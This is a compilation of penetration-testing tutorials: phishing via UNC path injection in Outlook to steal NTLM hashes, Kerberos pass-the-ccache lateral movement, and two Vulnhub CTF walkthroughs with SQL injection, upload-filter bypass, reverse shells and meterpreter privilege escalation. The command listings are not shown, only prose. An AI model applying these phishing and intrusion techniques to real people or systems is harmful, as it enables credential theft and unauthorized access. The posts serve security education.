Abusing Microsoft Outlook 365 to Capture NTLM

In this post we will discuss “How the attacker uses the Microsoft office for phishing attack to get the NTLM hashes from Windows.” Since we all knew that Microsoft Office applications like Word , PowerPoint , Excel and Outlook are the most reliable resource for any organization, and an attacker takes advantage of this reliance to masquerade the user.

Here, we’ve been trying to explain what a different approach an attack uses for a phishing attack to capture Microsoft Windows NTLM hashes.

In actual fact, the attacker tried to use the UNC path injection technique to capture the Windows NTLM hashes and use phishing to achieve his goal.

Table of Content

  • Link UNC Path in an Image
  • Link UNC PATH in a Text File
  • Link UNC PATH Word Document

Walkthrough

Here we are using Kali Linux and its IP is 192.168.1.112, this IP will be used for UNC Path.

Link UNC Path in an Image

Objective 1: send phishing mail to the target user that contains malicious image.

Use office 365 to linking UNC path within an image, for this insert an image and draft a mail for your Victim to masquerade him/her.

Inject the UNC path by adding a hyperlink to the image as shown below. Now-a-day attackers use the COVID-19 precaution images to carry out a large-scale phishing attack.

And we used our Kali Linux IP here to steal the NTLM hashes. This phase could be considered as an easy phase for a threat hunter while hunting for IOC as per pyramid of plain , because here the attacker’s malicious domain address or IP in dword format is used to evade the intruder detection system.

Once you have drafted your message using office 365, install the responder in your Kali Linux which to capture the NTLM hashes.

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Run the given command and just after executing responder send the mail to the victim.

Now, when the victim opens the mail and clicks on the image or opens a new tab or saves the image, his/her NTLM hashes have been stolen without his/her knowledge.

As result the attacker will obtain the NTLM hashes of the victim’s machine as shown in the image given below. Here you can observe that it has given NetBIOS username along with hashes.

An attacker may use John’s ripper or other NTLM hashed cracking tools to retrieve a password. As you can see here, we used the above NTLM hashes file generated by the responder to extract Victim’s password with the help of john the ripper.

Link UNC PATH in a Text File

Objective 2: Send phishing mail to the target user that contains Object.

Till Office 2013 it was possible to send a malicious attachment by injecting UNC Path but after Office 2013 the link to the file option is disabled, which prevents an attacker from carrying out a phishing attack via a malicious attachment.

Yet the attacker still figures out about the second alternative to send malicious attachment. Despite sending attachment they try to link object in the mail.

Here we have added a text file as object, here we cannot use “link to file” feature for injecting UNC path.

Once you will add the object, inject the hyperlink for UNC Path as done above, i.e. \\192.168.1.112 and mail to the victim. On other hand use responder, the to steal NLTM hashes as done above.

Now when the victim will opens the mail and clicked on the text or opens in new tab, his/her NTLM hashes has been stolen without his knowledge.

As result the attacker will obtain the NTLM hashes of the victim’s machine as shown in the image given below. Here you can observe that it has given NetBIOS username along with hashes.

Link UNC PATH Word Document

Objective:  Send phishing mail to the target user that contains Word Document Attachment.

In most scenarios, the attacker uses Word Document to make the email appear authentic, so he injects the UNC path inside the document file by hyperlinking the file inside. But as we mention, Outlook removed the option “link to file” or “insert as a link” to prevent attackers from sending malicious documents.

There is an alternative technique that allows an attacker to inject the UNC Path into the attachment. We have written the HTML code in a text file containing the UNC Path link in the src image as shown in the html image.

Now open a Word Document and link the html file as object, thus we move to “insert > Object > Text from file”.

Now insert the HTML file and select the option “insert as Link” as shown the image.

Now use the Word Document that contains a link to the HTML file to be sent as an attachment and sent the mail to the victim, and wait for the victim to respond by putting the responder in the back door.

Now, when the victim opens the mail and clicks on the text or opens a new tab, his / her NTLM hashes have been stolen without his/her knowledge.

As result the attacker will obtain the NTLM hashes of the victim’s machine as shown in the image given below. Here you can observe that it has given NetBIOS username along with hashes.

Conclusion: So we saw how the attacker cleverly injected the UNC path into an image or text file or Word document and masquerade the victim by sending Phishing mail.

Lateral Movement: Pass the Cache

In this post, we’ll discuss how an attacker uses the ccache file to compromise kerberos authentication to access the application server without using a password. This attack is known as Pass the cacche (Ptc).

Table of Content

Credential Cache

Ccache Types

Walkthrough Pass the Ccache attack

  • Method 1:Mimikatz
  • Method 2: KRB5CCNAME

Credential Cache

A credential cache (or “ccache”) contains the Kerberos credential although it remains valid and, typically, while the user’s session lasts, so that multiple service authentication (e.g. connecting to a web or mail server more than once) does not involve contacting the KDC at every time.

A credential cache usually contains one initial ticket which is obtained using a password or another form of identity verification. If this ticket is a ticket-granting ticket, it can be used to obtain additional credentials without the password. Because the credential cache does not store the password, less long-term damage can be done to the user’s account if the machine is compromised.

A credentials cache stores a default client principal name, set when the cache is created. This is the name shown at the top of the klist

Ccache Types

There are several kinds of credentials cache supported in the MIT Kerberos library. Not all are supported on every platform.

FILE caches: These are the simplest and most portable. A simple flat file format is used to store one credential after another. This is the default ccache type.

API: It is only implemented on Windows. It communicates with a server process that holds the credentials in memory for the user, rather than writing them to disk.

DIR points:  To the storage location of the collection of the credential caches in FILE: format. It is most useful when dealing with multiple Kerberos realms and KDCs.

KEYRING: It is Linux-specific, and uses the kernel keyring support to store credential data in unswappable kernel memory where only the current user should be able to access it.

MEMORY caches: These are for storage of credentials that don’t need to be made available outside of the current process. Memory ccaches are faster than file ccaches and are automatically destroyed when the process exits.

MSLSA: It is a Windows-specific cache type that accesses the Windows credential store.

Read More about  MIT Kerberos Credenial Cache from here: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html

Walkthrough Pass the Ccache attack

Pass the ccache attack uses ticket granting ticket to access the application server without go by kerberos Authentication, here we will try to store Kerb5_tgt in form of ccache and use or pass this ccache file to service application server.

Method 1:Mimikatz

So we have use impacket python script gettgt.py which will use a password, hash or aesKey, it will request a TGT and save it as ccache.

with the help of above command, you will be able to request Kerberos authorized ticket in the form of ccache whereas with the help of the following command you will be able to inject the ticket to access the resource.

Once you have the ccache, use mimikatz to pass the ccache file and try to access the resource, thus you need to execute following commands:

privilege:debug

Note: Here we first generated the ccache and then used mimiktaz, but you can also drag the ccache file from the memory using Klist-c, which will list all the ccache stored in the memory and then use mimikatz to access the resource.

And so a new command prompt will be triggered, which will be the CMD of the requested resource service. You can see how we access the resource without using the password or ticket.kirbi file to access the resource.

Method 2: KRB5CCNAME

Similarly we have use getTGT to to generate the ccache and used KERB5CCNAME pass the ccahe file for the requested service. This is completely remote attack without using local system of compromised victim, but you need to compromise NTLM hashes for that, type following to conduct pass the ccache  attack remotly.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

mhz_cxf: c1f Vulnhub Walkthrough

CTF’s are a great way to sharpen your axe. As a security enthusiast, this is probably the best way to get some hands-on practice that lends perspective as to how an adversary will exploit a vulnerability and how as an infosec professional we will eliminate that risk or guard against it.

This is a very engaging CTF, it has some aspects of steganography. It gives you the chance to turn those wheels but not so much so that you get frustrated, think of it as somewhere between easy and intermediate level. You can download it from here.

Now, let’s dive in.

Penetration Testing Methodology

  • Network Discovery and Scanning
    • Using Netdiscover
    • Using Nmap
  • Enumeration
    • Directory Bruteforce using dirb
  • System Exploration
  • Data Exfiltration
    • Using SCP
  • Steganography
    • Using Steghide
  • Privilege Escalation

Network Scanning

We begin by scanning our network for the target machine using Netdiscover.

The target machine is active on 192.168.1.104. Let’s scan it and see which services are running and which ports are open.

We do an aggressive scan on the target using map.

The scan gives us a lot of good and useful information, but what stands out the most is that port 22 and 80 are open, let’s explore port 80 first and see what we can find there.

This does not help much, time to move to the next stage.

Enumeration

Let’s try to bruteforce the directory using dirb and see what we come across. We are using the -X flag to specify that we are looking for .txt formats only.

It seems we have found something! Let’s navigate to the link that’s given above in our attacking machines web browser and see what we find.

The maker of this CTF seems to be hinting that remb.txt and or remb2.txt might hold some valuable information. Let’s navigate to them.

This looks like a username and a password; I wonder where we will be able to use it?!

System Exploration

We did see that the victim machine has port 22 open, let’s try our luck with SSH, maybe these credentials will work.

We were successfully able to connect with the victim machine over SSH using “flagitifyoucan1234” as the password.

Moving around in the directories we find “user.txt” that gives us a clue about the privilege level. Looking further we find a directory named after the CTF machine that holds image files, this is the part where see the potential for steganography.

The images need to be moved from the victim machine to the attacking machine so that they can be investigated further.

Data Exfiltration

There are many ways to exfiltrate data from a system but considering that this is a Linux system, the chances of finding SCP installed on it already are very high, so let’s use that instead of un-necessarily trying to install a new application.

In our attacking machine, we make a directory to call the files to, enter that directory and then start SCP with the credentials that we found earlier. Defining that we want to import all the files in the “Paintings” directory.

On checking the contents of the “raj” folder, we see that our operation to exfiltrate data was successful, all the image files in the Paintings directory are now in the attacking machine, ready to be scrutinized.

Steganography

Steghide is the tool of choice here for obvious reasons. We need to find what information is hidden in these images.

On running Steighide, for the image names “spinning the wool.jpeg”, we are prompted for a passphrase, where we use the credentials that we had found earlier. This reveals a text file named “remb2.txt”. If you recall, we have come across this particular file name in our earlier screenshots. 

We open the file to reveal what looks to be more credentials, let’s see where they can be used.

Privilege Escalation

We go back to the terminal we have open into the victim machine and try to switch users to “mhz_c1f” and use the password that we just found, and it works, we are in!

On checking the privilege level held by this account. This account is part of the sudo group, so let’s try to get a better foothold. We are now in the root directory and on checking it’s contents we find “.root.txt” and on opening it, we get our final flag!!

This concludes our walkthrough for mhz_cxf: c1f, we hope you enjoyed it and picked up a few useful pieces of information on the way.

CTF’s are the best way to wrap your head around the concepts and though flows required to be a penetration tester, it gives you a chance to think critically and apply what you have learnt so far about hacking, in a safe environment.

As always, we at hacking articles will try to get you latest and greatest in the sphere of infosec.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

CengBox: 1 Vulnhub Walkthrough

Today, I am going to share a writeup for the boot2root challenge of the vulnhub machine “Cengbox:1”. It was an easy box based on the Linux machine which helped me learn many new things. The goal is to find the user and root flag.

Penetration Testing Methodology

  • Reconnaissance
    • Netdiscover
    • Nmap
    • Dirb
  • Exploitation
    • SQLmap
    • File Upload
  • Privilege Escalation
    • Pspy script
    • Meterpreter session
  • Capturing the flag

Walkthrough

Reconnaissance

Let’s start recon for this machine using Netdiscover, It is used for identifying the IP address of the various machines in our network work It works as traceroute.

As we got our target IP address for the machine (192.168.1.106), Next, we use nmap for the port scanning and further information gathering on the target host.

Since port 80 is open, Let’s explore the domain or webpage on this IP address using Web Browser.

We will also perform fuzzing to find the endpoints using the dirbuster tool with the big.txt wordlist which can be located inside /usr/share/wordlists directory.

We got some directories like (uploads, Masteradmin, etc). After checking all the directories, we got an Error Page with the endpoint masteradmin/.

We decided to do fuzzing for http://192.168.1.106/masteradmin using the dirbuster tool but with the extension, filter to find any php files that might be present in the masteradmin directory.

In the above image, we can see that there are login.php and upload.php endpoints as we can try to take a reverse shell using upload functionality or we can try to bypass the login page using SQL injection. So, let’s try to explore these endpoints for further enumeration.

Landing on the login page we can see that we will have to bypass the authentication panel i.e., username and password both.

Exploitation

Since we got the login page for which we need to find the username and password to login the page for further exploitation. Here, I tried brute-forcing the parameters but it didn’t work for me so I chose to try the hand at SQL Injection with the sqlmap tool. I ran it with the URL as the parameter and we also use the forms, dbs, and batch parameters.

Sqlmap works for a while and gives us the names of some of the databases. Out of the extracted databases, one that interests us is the cengbox. So, we decide to enumerate it further.

Further dumping the data of this database by using the command given below:

Here we can see that there is a table named admin inside the database we were looking in. Looking further we found the credentials for masteradmin.

So the valid credentials for this login page are

After logging in as masteradmin, we see that we have a file upload functionality.

At first, I tried to upload the php-reverse-shell.php from the available web shell directory to get a reverse shell on the target machine but it told me that the extension is not allowed. I need to upload a CENG file.

So to bypass this upload filter I tried changing the extension of the same reverse shell php file as shown in the image below.

After renaming the shell we tried to upload the file again. This time I was successful in uploading the file.  Using netcat listener we will establish the connection and got the shell.

During our enumeration we got a user named cengover we also git it in the above scanning of sqlmap we got the credentials. Here we will switch the user from www-data to cengover and for that we will use the password that we found was C3ng0v3R00t1!

After getting the shell, I looked around for the user flag.

Privilege Escalation

Now moving towards the root flag, we need to check the permissions and some hidden processes running in the machine for finding the hidden processes running in the machine we need to download the pspy script in the remote machine. We will use the wget command for it.

Now, we need to provide the proper permissions. After that, we will execute the script.

Below are some hidden processes we got one python script is having the md5check.py. Let’s check the permissions on this file.

Here, we can see that md5check.py has the read and write permissions.

Now using msfconsole will make one executable shell. And create one session to gain access through meterpreter. Meterpreter is generated only when the session is created. It helps in gaining full access to the target machine.

Edit the md5check.py file and insert the payload generated inside it and save the file.

This gave the shell access in the meterpreter session created before.

Here we got our root flag. Happy Hacking! See you next time.

Author: Sushma Ahuja is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on LinkedIn